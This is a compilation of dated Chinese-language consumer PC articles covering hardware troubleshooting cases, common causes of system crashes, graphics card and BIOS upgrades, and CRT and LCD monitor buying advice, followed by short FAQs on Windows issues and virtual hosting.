   近年来，随着计算机芯片集成规模的迅速提高，制造工艺水平的不断进步，生产成本的稳步下降，生产规模的不断扩大，个人电脑又称微型计算机走入了千家万户。计算机由娇贵的实验室设备，演变成为了普通家庭能够负担得起的家用电器。
   然而毕竟与一般家电不同，计算机虽然不再是过去那种以小时计算无故障使用时间，无论使用和维护都需要专业人员的精密仪器。但是，作为一种高精度的数字运算和信息处理的数字电子设备，加上计算机内部各组件采用不同厂商生产的标准化模块，计算机故障还是比较容易发生。而正因为制作工艺的大幅提升，计算机故障往往不如它表面上看起来的那样严重，即使是具备一些简单的计算机使用和组装知识的普通用户也完全能够应付自如。故障处理的一般规则：
   1、 面对故障现象不慌乱，保持头脑清醒，冷静的判断问题
   2、 不过高的估计问题的复杂性，从软到硬，从最简单的情况入手
   3、 仔细地考察故障发生前的系统变动，故障有90%的可能性是由最后这一次的软件或/和硬件变化引起
   4、 细致地观察故障现象，并反复改变计算机的硬件或软件状况，并根据故障现象是否发生变化来判断故障位置
   5、 回忆过往处理计算机类似故障的经验，通过维修资料、懂行的朋友或网络新闻组寻找解决办法
   6、 以上办法都试过但仍无法奏效时，送指定或专业的维修点维修。若可能的话，不妨了解一下专业人员是如何解决这个问题的
   故障现象（1）：开机黑屏，计算机显示屏右下角指示灯由绿变黄，硬盘由于寻道发出高速的旋转声变为低速的旋转声，硬盘灯灭，无开机报警声。本机配置：奔腾200MMX、32M现代内存、华硕TX97E主板（Award BIOS）、昆腾火球四代4.3G硬盘、金鹰9685显卡、PHILIPS 105A显示器、帝盟S90声卡、创新24X光驱
   故障的分析与解决：开机黑屏是一类较为头疼的故障类型，提示信息少，计算机完全无法正常启动，经验较少者往往感到难以入手。因一开机就无法运行，很容易就可判断这类故障属于硬件故障（CIH破坏BIOS数据或BIOS升级失败，往往也会造成开机黑屏，不过这也应属于硬件故障）。首先回忆故障发生前曾经装卸过第二硬盘，很可能是因为硬盘数据线未插紧（因该机数据线有防反向插入的小突起，故数据线插反不可能）。仔细地将硬盘数据线与主板、硬盘牢固连接后，再次开机，故障依旧。因故障发生在拆装计算机部件之后，极有可能是安装过程中机箱的翻动造成某插接件接触不良，而能够造成这种故障现象的插件只可能是内存或显卡。拔去内存条，再次开机，计算机发出"嘟--嘟--"的长响不断，表明无法检测到内存。因故障现象发生改变，可以判断出故障应出在内存处。仔细将内存插入插槽，并确定内存的金手指与插槽簧片接触紧密。再次开机，故障排除。
   故障现象（2）：两只不同型号的创新24X光驱在使用一年后，先后出现读盘能力严重下降，只能读取质量极好的光盘，并且有一只读盘发出巨大的噪声（可与洗衣机媲美），另一只噪音相对较小。
   故障的分析与解决：根据读盘发出的噪音可以判断出，显然是该光驱的夹盘装置有问题，光盘不能正常夹紧，产生噪音，难以正确读盘。将噪音大的光驱外层铁壳上的螺丝钉卸下，去掉光驱的塑料面板，却突然发现这层外壳仍无法打开。对于第一次拆光驱的生手来说，真的有点束手无策，因为此时光驱上已经没有任何其它的固定用螺钉了。经过查阅资料得知，光驱的固定结构一般有两种，一种仅仅是用螺钉固定，另一种则使用了暗扣固定。不打开暗扣，光驱肯定打不开。不幸的是，正拆的这只光驱正是使用暗扣的那一种，噪音小的那只则仅用螺钉固定。仔细观察该光驱，终于在光驱的塑料底部的内层发现了一前一后、一左一右处在长方形对角线上的两个塑料卡子。将两塑料卡向内扳住不松手，就可将外层铁壳取下。观察铁壳上的压盘器，一般有两种原理不同的压盘结构：弹簧压盘和磁性压盘。弹簧压盘器采用簧片的弹力夹紧盘片，如此则可适当调节簧片的形变，将各簧片向下方拉一下，但不可太过。噪音较小又没有使用暗扣的这只光驱恰好就是这种簧片压盘式结构，簧片调整后该光驱恢复了正常，故障排除。遗憾的是，噪音又大使用暗扣的那只，使用的却是磁性压盘式，它采用两块圆环形磁铁夹紧盘片。对于这种情况，就没什么好办法去解决。只好宣布该光驱光荣引退。
   故障现象（3）：一台品牌机，采用SIS芯片主板、奔腾200MMX、32M内存、3.2G迈拓硬盘，使用Windows95操作系统。在控制面板的系统选项中修改主板IDE控制接口为启用双IDE通道。重启，在显示Windows95启动画面后黑屏。
   故障的分析与解决：因故障的发生是由对操作系统主板IDE控制接口属性的修改直接引起，加上计算机能完成启动的前半部分--开机自检、引导操作系统直至Windows运行至对系统硬件初始化时方死机。该故障显然是迈拓硬盘与SIS芯片不兼容，使用IDE通道默认值倒没什么问题，一旦启用双IDE通道，不兼容性就立即凸显。首先考虑进入Win95安全模式，将选项修改回来。然而遗憾的是，该方法不奏效。再次进入安全模式，将主板驱动程序、硬盘驱动程序全部删除后重启。计算机重启后，重新找到主板、硬盘驱动程序并安装。再次重启后，Win95竟然仍旧记住了原先的设置，又一次以同样的方式死机。没办法，只好将Win95直接在原来的目录进行覆盖性重装。硬件驱动程序安装好后，Win95还是在同样的时候当掉了。记性也太好了吧！现在只有忍痛删掉Windows主目录了，再一次重装操作系统，总算顺利启动了，故障排除。
   通过以上对具体故障实例排除过程的介绍，不难看出一般性故障的解决并不是那样困难，即使是其表面上看起来十分吓人。细心再加上一些实际经验，问题往往都不会太难。
   很多计算机故障往往都是由插件间的接触不良引起的。而这又常与机箱、主板、板卡的设计尺寸有关。很多机箱的背部插槽开孔，设计尺寸总是有些小的偏差，板卡插入后常发生形变，很容易造成接触不良。甚而常常造成板卡插不进去、插进去后又拔不出来、插好后无法固定顶部的螺丝钉等问题，很容易损坏插槽簧片。更麻烦的是很多使用免螺钉的塑料卡子卡住板卡、硬盘、光驱的高档机箱（以爱国者的月光宝盒系列最为常见）。塑料卡子往往卡不住板卡，机箱搬动几次就松动了，开机就黑屏。主板的固定孔的设计也很不合理，四个边角总有一个下方无支撑螺栓。在这附近拔插板卡或是内存条，全凭主板的韧性和弹力，真是有劲无处使。
   愿广大的用户在计算机使用和维护中注意积累一些经验，当出现一些较简单的小故障时都能够自己动手解决它。


系统崩溃情况详解

《一键清理系统垃圾》

系统崩溃情况详解

   在使用计算机的过程我们不可能没有系统崩溃的经历，即使是最简单的日常操作业也可能对系统带来一定的损害。事实上，由于人们在用机过程中的不小心——从软件的安装到不经意的数据拷贝——都有可能导致出错提示、系统崩溃以及其他的毛病。
   系统崩溃主要可分三种情况：
   一、由软件造成的崩溃：即使是最简单的操作，比如程序的安装与卸载都有可能造成系统崩溃。
   二、由系统本身而造成的崩溃：在删除DLL文件，修改注册表，或者对操作系统进行升级前请听一下我们的建议。
   三、由硬件问题所造成的崩溃：计算机不是家具，需要经常维护，我们将告诉大家如何做。
   这里我们列举了18种常见的系统崩溃情况。针对各种情况我们也给出了如何识别，消除以及处理的对策。
   （1）由软件造成的崩溃即使是性能最好的PC硬件也离不开软件的支持——也就是我们通常所说的应用程序、操作系统以及驱动程序。但是如今的软件是越来越复杂、越来越庞大。这里我们将告诉大家如何使你的机器运行的更流畅。
   不经常备份对策:备份没商量你经常对系统进行备份吗？没有？现在就进行很有必要！对一些非常重要的临时文件（如工作文档，金融资料）进行备份并不难，如果系统出现问题，还会为你省下不少重复性的工作。对于不大的文件我们可以备份到软盘，而对于上十兆的文档、电子表格、照片集、视频文件我们可以备份到Zip、Jaz、CD-R或者是CD-RW中。
   如果你认为备份非常麻烦的话，那么你可以比较一下，在系统出现问题（比如由于病毒使整个硬盘的数据丢失）以后重新创建所丢失的东西哪个更麻烦呢？
   致命病毒感染对策：及时“接种疫苗”有“下载癖”的人该注意了，由于经常从网上下载了许多新东东，在安装运行之后，突然许多重要的文件莫名其妙的“无影无踪”了？这该如何是好——无他，运行最新的病毒扫描程序！因此在下载文件，共享软盘，打开电子邮件中的附件以及运行宏的时候请启动病毒扫描程序。使爱“机”免受病毒之苦的最好办法就是对你所下载的每一个文件进行扫描，保持病毒扫描程序随时在后台执行，并对病毒库经常进行升级从而不给新的病毒以可乘之机。
   滥用测试版对策：三思而后“下”xx软件又出测试版啦！往往一些商业软件在推出正式版之前都会发布一些该软件的测试版，由于它通常都是免费的，所以受到一些用户的欢迎。可是“天下没有白吃的午餐”，测试软件通常带有一些BUG或者是造成系统崩溃、数据丢失的程序错误。
   如果你希望系统更安全的话，不要对早期推出的测试版软件马上下载使用。最好是等他们推出版本较高的测试版或者是正式的演示版。如果对最新的测试版软件非用不可的话，最好还是对系统进行备份至少也要对当前所做的重要工作进行备份。
   非法卸载对策：按部就班对于我们所安装的Windows程序都会在系统中进行注册，或者在Windows Uninstaller utility中创建一个log文件，在这个文件中会记载一些你增加的文件以及对系统配置所作的修改情况。当你在“控制面板”中使用“添加/删除”或者是使用程序自带的卸载程序的时候，Windows将删除此程序在系统中的所有踪迹以及对系统的修改。
   如果你不打算不再使用某个程序，那么你可不要简单的把此程序的文件夹拖到“回收站”完事。而必须一步一步来，点击开始—设置—控制面板，然后双击添加删除图标，选择安装/卸载选项最后双击需要删除的文件。
   共享之祸对策：升级悠着点大多数人认为，软件升级是不会有问题的。事实上，在升级过程中都会对其中共享的一些组件也进行升级，但是其他程序可能不支持升级后的组件从而导致各种问题。
   还有一种情况就是，升级覆盖其他软件将要使用的共享模块程序。
   例如，如果winsock.dll (一个非常重要的上网用动态连接库文件)被覆盖了，那么使用此文件的程序将无法上网。如果你打算对某个软件进行升级，那么请对使用此版本处理的文件进行备份并把老版本的程序卸载掉，然后安装新版本并重新恢复以前所做的备份。
   RAM不足对策：释放内存Windows可以同时运行多个程序，但是这并不能保证它们能够“共存共荣”，特别是在系统内存并不是很充足的情况下。要了解当前系统资源利用情况，大家可以打开“我的电脑”，在“帮助”菜单下打开“关于”菜单则会发现系统资源利用情况。如果系统资源所剩无几（20％以下），你就要小心了，这时最好关闭一些不必要的程序。
   内存泄漏将会浪费一定的系统资源。当启动一个程序时，Windows就会为之分配一定的资源（内存），而在关闭此程序以后，Windows就会回收资源。但是有时候，由于程序本身的问题会导致内存资源无法回收，这时只有重新启动系统。如果你怀疑某程序可能导致了内存泄漏，那么你可以检查在开启/关闭程序的前后，系统资源发生了怎样的变化，如果在关闭程序后，资源没有没有变化，那么可以找一下看此程序有没有补丁能够修复这个泄漏。
   （2）由系统本身造成的崩溃即使是最简单的操作，比如关闭系统或者是对BIOS进行升级都可能会对你的PC合操作系统造成一定的影响。如果在这些过程中处理不当，你的PC可能启动不正常甚至根本无法启动。
   不过，如果你了解了如何适当地处理这些操作，就可以很好的保护你的PC免受崩溃之苦。
   BIOS破坏对策：备份BIOS你的系统需要对BIOS进行升级吗？那么在升级之前最好确定你所使用的BIOS版本是否与你的PC相符合。如果BIOS升级不正确或者在升级的过程中出现意外断电，那么你的系统可能无法启动。所以在升级BIOS前千万要高清楚BIOS的型号。如果你所使用的BIOS升级工具可以对当前BIOS进行备份，那么请把以前BIOS在磁盘中拷贝一份。同时看系统是否支持BIOS恢复(也就是引导块恢复)并且还要懂得如何恢复(目前有一些工具软件比如Norton Utilities Rescue Disk已经可以对BIOS进行备份并在出现问题的时候进行恢复)。万一BIOS升级失败，以上步骤可以进行恢复。
   文件管理不善对策：启动Windows“自我疗法”尽管如今的硬盘在使用寿命，稳定性方面都有了很大的进步，但是存储在上面的文件总有出问题的时候。文件出错比如文件分配单元出错(簇丢失)和簇链接交错(这种情况一般发生在多个文件使用同一个簇块上)，一般程序崩溃和蓝屏现象都是由这两个错误导致。为了检查和纠正这些文件错误，你可以每隔几个星期运行一下“磁盘扫描程序”程序(Windows自带程序，可以在开始—程序—附件—系统工具中找到)。选定所要扫描的驱动器然后运行就可以在一两分钟内搞定。如果时间充裕的话也可以选定修复错误选项。
   这里还有另一个一般性的错误。当你建立、删除、编辑和改动文件的时候，存储这些文件的簇就会散布在硬盘上。这样就会导致Windows FAT文件系统在读写这些“七零八碎”文件的时候非常的“吃力”。为了修复这些问题，我们可以每隔几个星期运行一下磁盘碎片清理工具（可以在开始—程序—附件—系统工具中找到）来重新组织磁盘上的文件这样来使得包含文件的簇块能够集中在一起。选定相应的驱动器后便可开始，不过这个过程的耗时较长。
   非正常关机重启动对策：Reset键少用为妙在没有“关窗”之前请不要直接关闭PC电源或重启动。在一般情况下程序都会打开、创建各种不同的文件(例如，虚拟内存交换文件和临时文件)，只有正常关机、重启动，这些文件才能够保存，而且还可以把内存中的文件保存到硬盘中。不过，如果你的爱机已经“发呆”，即使你按下Ctrl-Alt-Del它也“麻木不仁”，那就不得不按Reset键了。
   Windows之病对策：升级升级再升级！
   尽管Windows与大多数硬软件都能够“和睦相处”，但是各种BUG和漏洞在所难免，于是微软公司推出了许多Windows补丁程序来修复这些错误。我们可以访问Windows相关的升级站点或者从“开始”菜单运行WindowsUpdate，这样我们就可以获得各种OS补丁、加强系统安全以及获得最新的工具程序(比如最新版的Media Player和IE浏览器)。我们可以每隔3到6个月检查一下是否有新的升级程序并选择有用的东东下载。在升级之前最好对一些重要数据进行备份。
   篡改注册表对策：不懂就别动！
   当安装Windows的时候，它会创建一个重要的文件来跟踪大量的硬件和软件安装信息以及许多的系统设置。这个文件就是注册表。在增删软硬件的时候Windows也会自动对注册表进行修改。对于大多数人来说注册表中的内容让人很难以理解，所以在不清楚的情况下千万不要乱动，否则出现问题Windows可能无法启动。
   文件误删对策：有时也要“NO”一般在删除文件的时候，系统都会给出提示，对于普通的文件（如文档、图片等）可以直接按“OK”，而那些比较重要的文件，比如EXE、DLL文件或者是某个程序的组件在删除前请好好考虑一下，还有就是位于Windows System文件夹下的也是一些非常重要的文件，删除要慎重。不过Windows配有回收站，如果清空它，许多文件将被永久性删除。所以不要频繁清空它。
   （3）由硬件造成的系统崩溃如果不出现问题，我们很少去动机箱中的各种组件。但是扩展卡松动，数据线磨损，系统过热以及其他的各种故障都会使我们的PC不干活。其实，无须专业人员我们自己就可以采取一些措施来加以预防。
   “溺水而亡”对策：喝水请到一边去键盘对水都比较敏感（比较高级的防水键盘那就另当别论了）。如果水洒到机器中，请立即关闭电源并把浸透到设备中的水擦干净。最好不要PC旁边喝水，即使喝的话最好是把机器用东西盖一下。
   过热损耗对策：通风很重要在操作过程中显示器的发热量非常大。
   保持良好的通风状况非常重要，不要把书本等东西放到显示器上。如果显示器过热将会导致色彩、图象失真甚至缩短显示器寿命。
   移动不当对策：避免振动PC是放在桌上的，不是笔记本，不要频繁的搬来搬去。因为在移动过程中如果受到很大振动往往会使机器内部CPU、RAM以及扩展卡松动，从而导致接触不良。如果要转移机器，最好使用有垫子的箱子装好，显示器向下放置，这样可以降低其重心，减少晃动。
   电子损坏对策：一切为了“稳定”计算机不要同时与空调等高耗电的家电同时开机，因为由于电流过高产生浪涌对电源线和电脑都是会带来不利，更有甚者会击穿电脑中的电子元件，这样整个系统就真的崩溃完蛋了。所以有条件的话可以配置一台稳压器，如果所在地区经常停电也可以使用UPS。
   烟雾杀手对策：保持空气洁净吸烟有害健康，同样，烟雾也会进入驱动器，并对读写头造成一定的影响，从而导致读写数据出错，通常读写头都是悬浮在碟片上面，所以如果读写头上沾染了一些烟雾颗粒，可能造成与碟片接触摩擦，从而使导致读写错误。烟雾也会影响CD，DVD碟片质量而引起读盘错误。因此最好不要在计算机旁抽烟。
   光盘缺乏“关爱”对策：避免光盘污染与划伤指纹，灰尘，污垢以及刮痕都会导致读盘错误，刮痕太深还可能无法读盘。CD最好放在CD包中，拿的时候手不要触摸碟面。也不要在CD上贴标签。如今的光驱速度都很快，因此即使是很小的标签都会导致读盘无法保持平衡，一般光驱读盘时发出“吱吱”怪叫就说明碟片无法保持平衡。虽然这对光驱本身并没有什么影响但是会导致读盘错误。如果要做标记的话可用水彩笔直接在光盘背面写。


显卡升级步步通

《一键清理系统垃圾》

显卡升级步步通

   目前3D显卡已经发展成为家用PC的标准配置，越来越多的3D游戏都需要性能强劲的显卡来支持，许多老机器上的显卡显然已经不能胜任了，因此，升级显卡已经成了当务之急。在很多高手眼中，升级显卡只不过是小菜一碟，而对菜鸟们来说，如何升级显卡却成了老大难问题。
   和主板一样，显卡的升级同样包括了升级显卡BIOS和直接用新显卡换掉旧显卡，下面就分别给大家介绍一下两种方法：

一.新显卡取代旧显卡
   目前市场上各种各样的显卡相当多，你在选购显卡前一定要了解你的主板支不支持新的显卡，主板上是否有AGP槽，该选购AGP还是PCI槽的显卡？当然，只有买到了主板能支持的显卡，你就可以开始下面的安装步骤了：
   第一步：将电脑关机，拔下所有连线及电线，用螺丝刀打开电脑机箱。
   第二步：找到电脑主机上的AGP插槽。拧掉固定金属片的螺丝后，拔下旧显卡，将新显卡插入槽中，再将螺丝拧紧。
   第三步：固定好电脑机箱，把显示器的信号线接头接在显卡的接口上。再将所有连线和电线接回。把视频线一头插在显卡上，一头插入电视接口。
   第五步：打开电脑，把驱动程序光盘放进光驱，系统会出现安装提示，一步一步安装就可以了。
   这种升级显卡方法比较简单，但是花费比较大，你必须花费大量的银子去购买显卡，并把老显卡扔掉。不过这种方法却能达到很好的效果，因此很多人都愿意去购买新的显卡。

二.如何刷新显卡BIOS
   与第一种方法比较，升级显卡BIOS是一般DIY发烧友经常搞的事情，虽然并不能从根本上提高显卡的性能，不过可以在不花钱的基础上尽量榨干老显卡的性能，让它能发挥出最大的余热，因此这种方法还是为许多人所津津乐道。下面为大家简单介绍一下显卡BIOS的刷新，详细的显卡BIOS刷新教程网上很多，有兴趣的朋友可以去学习学习。
   一般的，显卡的BIOS可以到显卡生产商的网址上下载，它需要有一个专门的写入程序才能够写入显卡之中。
   下载BIOS之前，一定要仔细阅读网页上的说明，下载与自己的显卡匹配的文件。大部分显卡的BIOS升级都是类似这样的语句：nvflash.exe w2137.rom
   其中，nvflash.exe是FLASH ROM的写入程序，不同的卡和不同的图形芯片都可能有自己的专用的刷新程序，不可以随便混用。后面的.rom(有些是.bin或者别的扩展名)文件就是BIOS代码了。
   刷新显卡BIOS时，最好进入纯DOS环境。运行上面一条语句后，大多数需要进行确认，然后就开始显卡BIOS的刷新工作，这个过程大约就是10到几十秒之间。
   不同的刷新程序一般都可以带一些参数，用以完成像自动进行(不需要确认)、备份当前显卡的BIOS等功能。
   在刷新的过程中间，绝对不要关闭机器或者按复位键，等刷新工作结束后，会有提示表示刷新完成了。这时，需要重新启动计算机，才能使新的BIOS开始工作。
   如果在刷新的过程中出了问题，启动的时候就不会看见任何显示，这时不要慌。如果还记得刚才BIOS刷新操作的过程的话，在另外一台机器上，把刚才的刷新操作的文件拷到一张启动盘上，把刷新命令写到这张盘的Autoexec.bat里。拿着做好的启动盘到自己的计算机上，放进去重新启动，如果能够看见读软驱，再等个几分钟，然后启动计算机，一般就可以了。所以建议升级显卡BIOS前先检查是否允许电脑从A驱引导。如果你的显卡是AGP的，就可以找块其他显示芯片的PCI显卡，插在机器里面正常启动，然后运行刷新程序进行刷新操作，也可以修复显卡BIOS。


显示器选购十步走

《一键清理系统垃圾》

显示器选购十步走

   有句广告语说：“品位如何，要看用什么显示器”。如何选择和自己品位相得益彰的显示器呢？
1. 外观
   首先要看的是外包装有没有打开过。如果封箱的胶条（包括包装箱底部的封条）有两层或更多的话，说明曾经被开过箱，最好不要。包装箱上应该印有商标、序列号等信息。打开后，泡沫塑料应该是崭新雪白的，绝大多数显示器都应该套在一个大塑料袋里。显示器表面不应该有污渍、手印等，显示屏的涂层应没有脱落或划伤的痕迹。

2. 分辨率
   先将显示器设置为最佳分辨率（1024×768），调节画面至满屏显示。
   必须注意的是，许多商场都是用一个分频器同时接上N个显示器，而分频器对显示器显示效果的影响很大。可能的话，应该让经销商把你要购买的显示器直接接在显卡的VGA接口上。而且最好不使用NVIDIA的显示卡，因为NVIDIA的显示卡在聚焦等方面不太好，会影响最终显示效果。

3. 聚焦
   设置好显示器的分辨率及刷新率后，将对比度和亮度均调到最小，然后看看屏幕是否全黑。再把亮度和对比度调节到合适位置。调好亮度和对比度后，看看屏幕左上角“我的电脑”四个字是否清晰（这主要和显示器的聚焦效果有关），并将这个图标拖到屏幕四角以及中心，仔细观察屏幕整体聚焦情况如何。

4. 会聚
   除了聚焦，会聚效果也要注意看看。会聚分为水平会聚与垂直会聚，一般都可以分别调整。利用测试软件中的效果图可以很简单地看出显示器是否有会聚问题。直观地看，会聚不良的显示器在显示图像（尤其是文本文件）时会有一层淡淡的红色或黄色的色边。部分显示器可以调节会聚，此时可以试着调节一下。

5. 失真
   线形失真和非线形失真往往是最容易被消费者忽略的。线形失真就是线条不直，而非线形失真就是表格不匀。实际上，大多数显示器都存在不同程度的线形失真与非线形失真，且无法通过调节完全消除。对于一般用户而言，只要觉得可以接受就行，没必要追求完美。

6.“呼吸”
   呼吸效应是由于偏向线圈动态控制设计不够精确产生的，会在高亮度边缘变形。呼吸效应明显的显示器，在屏幕底色为纯黑时调节至满屏的画面，在底色纯白时会水平方向扩张，幅度一般在1毫米至3毫米左右，扩张幅度超过这个范围的显示器最好别买。

7. 温飘
   调试到现在，估计显示器已经开了二三十分钟了吧，这时我们可以观察一下显示器的温飘。由于显示器内部需要有预热的过程，所以一般显示器在开机半小时之后会有水平或垂直方向的位移，幅度在1毫米至4毫米范围的还可以接受。温飘对于一般用户并无影响，大家不必太在意。

8. 地磁
   地磁同样会对显示器产生影响（如果把磁铁放在显示器旁边，会使显示器颜色产生变化），显示器会偏色，部分区域会偏蓝或偏红。所以显示器的摆向最好面朝南或面朝北，东西摆向的显示器出现偏色的几率可能会更大一些。如果显示器出现了偏色，试着用用DOS菜单中提供的消磁功能。

9. 色纯
   与颜色相关的另一个问题就是色纯，色纯不好的显示器颜色看起来很“脏”，而且在全屏幕显示同一种色彩时尤其明显。我们可以将桌面的背景调成红、黄或蓝色来查看色纯情况。一般来说，采用特丽珑或钻石珑显像管的显示器在色纯方面表现一般都很不错。

10.摩尔纹
   摩尔纹，也叫水波纹，虽然在一般使用中不太能看得出来，但在一些半透明的时候（例如WINDOWS的关机画面中）就很明显了，屏幕上一道一道的很是难看。摩尔纹效应可通过调节DOS菜单中的相关选项来解除，但同样有一部分显示器无法完全消除。


为何不能进行磁盘碎片整理？

《一键清理系统垃圾》

为何不能进行磁盘碎片整理？

答：因为在整理硬盘的某个分区时，还有其他的程序在对这个分区执行写操作的缘故，所以在整理硬盘前，最好关掉所有的后台程序，包括病毒防护，Office快速查找等。另外可以换用第三方的磁盘整理程序，速度能大大加快。

为何有些软件在NT上不能正常运行？
答：NT是面向商业用途纯32位的操作系统，而WIN98是32位/16位混合的操作系统，对某些在WIN98下运行的16位软件NT并不能很好兼容，而且NT对多媒体和游戏支持得也没有WIN98好，作为家用微机还是安装WIN98为佳。

任务栏中音量控制图标没了怎么办？
答：要在任务栏中显示音量控制图标，可在“控制面板”打开“多媒体”中“音频”，选中下面的“在任务栏上显示音量控制”选项。如果你的声卡有资源冲突或驱动程序没安装好则在任务栏中将不能显示音量控制图标。打开机箱，检查声卡与插槽是否接触良好。如果检查无误，声卡还有冲突，可先将声卡驱动程序删除，方法是在“控制面板/系统/设备管理器”，将“声音、视频和游戏控制器”中的所有选项均删除，然后重新启动计算机。系统提示找到新硬件后，可根据提示安装声卡驱动程序。

为何会出现Mfm1992之类的文件？
答：这是微软标准ABC输入法的一个BUG。当出现自定义词组错误时，就会在当前目录下生成类似文件。你把它删掉即可。


虚拟主机知识

《一键清理系统垃圾》

虚拟主机知识

1、什么是虚拟主机?
   虚拟主机是使用特殊的软硬件技术，把一台运行在因特网上的服务器主机分成一台台“虚拟”的主机，每一台虚拟主机都具有独立的域名，具有完整的Internet服务器（WWW、FTP、Email等）功能，虚拟主机之间完全独立，并可由用户自行管理，在外界看来，每一台虚拟主机和一台独立的主机完全一样。

2、由于大家共用主机，每台虚拟主机的性能是否会下降？
   由于用作虚拟主机的计算机都是采用性能很高的电脑，一台主机所能够支持一定数量的虚拟主机，只有超过这个数量时，用户才会感到性能下降。如果配置得当，加上采用超高速的线路，虚拟主机的表现往往胜于采用较低速度（如256K、1.544M）线路连接的独立主机。

3、一台独立主机上能够支持多少虚拟主机？
   从理论上讲并没有具体数量限制，实际要看这台独立主机的CPU、内存容量、I/O通道速度、硬盘空间等性能。

4、管理一个虚拟主机是否很容易？
   您日常的工作主要是网页上传和电子邮件的处理。这些操作都非常简单。基本上不需要管理和维护您的主机，我们会帮助您完成绝大多数管理工作。在您需要自己管理时，它也比管理一台独立的主机容易很多。我们还可以给您提供资料来帮助您管理自己的系统。

5、虚拟主机的速度有多快？
   虚拟主机要比您自己架DDN，放置服务器快得多，7135的网络系统存放在上海热线的骨干网上，因此，无论在何处访问您的虚拟主机都会感到速度“如飞”。

6、我放在虚拟主机上的内容是否安全？
   非常安全。未经许可的人都不可能看到您的主机上的内容。

7、使用虚拟主机有什么限制？
   以下行为是不允许的：散布不受欢迎的电子邮件（SPAMing）或在新闻组进行不妥的言论发布；进行政治宣传和散布色情的内容；进行任何试图改变系统的配置或破坏系统安全的事情。


选购液晶显示器（二）

《一键清理系统垃圾》

选购液晶显示器（二）

问：为什么几乎所有15"LCD显示器的点距都是0.297mm？
答：15"LCD的尺寸一般为304.1*228.1(mm)，而大多数15"LCD的实际分辨率是1024*768，也就是说水平方向排列着1024个象素点，由此我们不难计算出15"LCD显示器的点距为304.1mm/1024=0.297mm。

问：我注意到笔记本电脑的显示屏大多很暗，不知LCD显示器是否也会有这个问题？
答：确实，不少笔记本的屏幕都比较暗，这主要是其亮度不够高造成的。通常，LCD的亮度在200cd/m2以上时，就不会存在发暗现象，而目前市面上绝大多数的桌面LCD显示器的亮度值都已达到200cd/m2以上，在任何光线环境下观看都不会模糊发暗。

问：为什么在侧面观看LCD显示器屏幕会看不清影像？
答：这是因为LCD显示器存在"可视角度"的问题。通常只有从正前方观看，LCD显示器的画面才可获得最佳观赏效果，而从侧面观看时，亮度与色彩都会出现失真、发暗。如果你购买LCD显示器不是用于演示用途的话，可视角度倒不是一个重要的指标，120度的可视角度已经足够了。即使你要用于演示用途，目前已有IPS、MVA、TN+FILM等多种广角技术被广泛应用，市面上已有不少可视角度在160度以上的产品，相信可以满足各种需求了。

问：听说LCD显示器不适合用来看VCD/DVD和玩游戏，是这样吗？
答：要回答这个问题，先让我们来看看什么是LCD显示器的响应时间。响应时间是LCD显示器的一个特有指标，标称液晶像素由明转暗或者由暗转明所需的时间。如果响应时间不够快，像素点对输入信号的反应速度跟不上，观看高速移动的画面时就会出现类似残影或者拖沓的痕迹。不过，目前一些高端LCD显示器的响应时间已经可以做到30ms甚至更小，基本上不存在残影现象，即使经常用于观看视频文件或玩游戏也不会有问题。


选购液晶显示器（三）

《一键清理系统垃圾》

选购液晶显示器（三）

问：LCD显示器是“数字式”显示器，我的显卡可以连得上吗？
答：LCD显示器只能处理数字信息，而我们使用的显示卡绝大多数只能输出模拟视频信号，因此需要将显卡输出的模拟信号通过模/数转换，才能为液晶显示器所接收。不过，目前大多数液晶显示器已内置转换模块，可直接与普通显示卡的15pin D型接口相连。

问：我的显卡支持DVI数字输出，接LCD显示器是否会有更好的效果？
答：由于省去模/数转换过程，减少了杂讯，因此理论上是可以获得最佳的显示效果。不过要注意的是，并不是所有的LCD显示器都支持DVI数字输入，在选购时可以看清楚了。

问：听说只要坏点不超过三个，就是合格产品，是这样吗？
答：这只是通常的行业标准，合格产品不等于好产品。由于坏点是永久性的，花这么多钱买台LCD，当然要选没有坏点的，除非这些坏点可以为你带来满意的价格折扣。目前许多品牌的LCD显示器声称采用无坏点的液晶板，这些产品自然才是我们的首选。

问：在选购时如何判断LCD显示器是否有坏点？
答：将屏幕调为纯白，如果有黑点即是坏点；再将屏幕调为纯黑，如果有持续发光的亮点也是坏点。


选购液晶显示器（一）

《一键清理系统垃圾》

选购液晶显示器（一）

问：为什么要购买LCD显示器？
答：LCD显示器最大的卖点在于无辐射污染，真正的安全环保，无损人体健康。而外型纤巧，节省空间也是LCD显示器受欢迎的原因之一。另外，LCD显示器才是真正的平面显示器，无变形、无失真。同时，随着大量新技术的应用，LCD显示器还具备了高分辨率、高亮度、高对比度、宽视角等原来CRT显示器才具备的优点。

问：LCD显示器有什么缺点？
答：价格高一直是阻碍LCD显示器成为主流的最主要原因，虽然近期LCD价格已大幅下降，但比起CRT显示器而言还是要高出不少，一台低端15"LCD显示器的价格已抵得上一台高端的17"CRT显示器。另外，受其成像原理影响，LCD显示器的色彩的表现力上还比不上传统的CRT显示器。同时，与CRT显示器相比，LCD显示器还存在着可视角度小、讯号反应时间慢等固有缺点。

问：LCD显示器适用于什么场合？
答：对于一般的家庭应用和办公场合，LCD显示器都是理想的选择。但如果你热衷于Quake之类的游戏，还是建议你选购大屏幕的CRT显示器，不然抽机输了可不要怪你的LCD响应时间慢。另外，对于广告设计等对色彩要求高的场合，也不适宜采用LCD显示器。

问：该选择多大尺寸的LCD显示器？
答：与CRT显示器一样，LCD的尺寸自然也是越大越好，不过价格也会逞几何级数递增。目前来说15"的LCD是主流，如果你囊中羞涩但又想过把LCD的瘾，不妨考虑价格便宜的14"的LCD显示器，毕竟怎么说，14"LCD的实际面积已等于甚至大于大多数15"CRT显示器的可视面积。

问：很多LCD显示器都标有“最佳分辨率”，何谓“最佳分辨率”？
答：LCD显示器的分辨率是由液晶层中实际单元格数量决定的，一般不能任意调整，这种分辨率称为LCD显示器的“实际分辨率”。这与CRT显示器有很大的不同。CRT显示器可由用户在显示器支持范围内任意调整其分辨率，而LCD显示器则只有在"实际分辨率"下才可以达到最佳的显示效果，因此“实际分辨率”又称为LCD显示器的“最佳分辨率”。虽然LCD显示器也可通过所谓的“居中显示”或“扩展显示”来调节分辨率，但这只是通过软件来模拟出来的分辨率，会或多或少的影响图像效果，甚至出现变型扭曲。

问：为什么在很多LCD显示器的资料上都看不到刷新率一项？
答：我们知道，CRT显示器只有在扫描频率达到一定数值时，才没有闪烁现象，而LCD显示器不存在扫描过程，一幅画面几乎是同时形成，即使刷新频率很低，如60Hz，也不会出现丝毫闪烁现象。对LCD显示器来说，刷新率并不是一个重要的性能指标。


一步一步教你升级主板

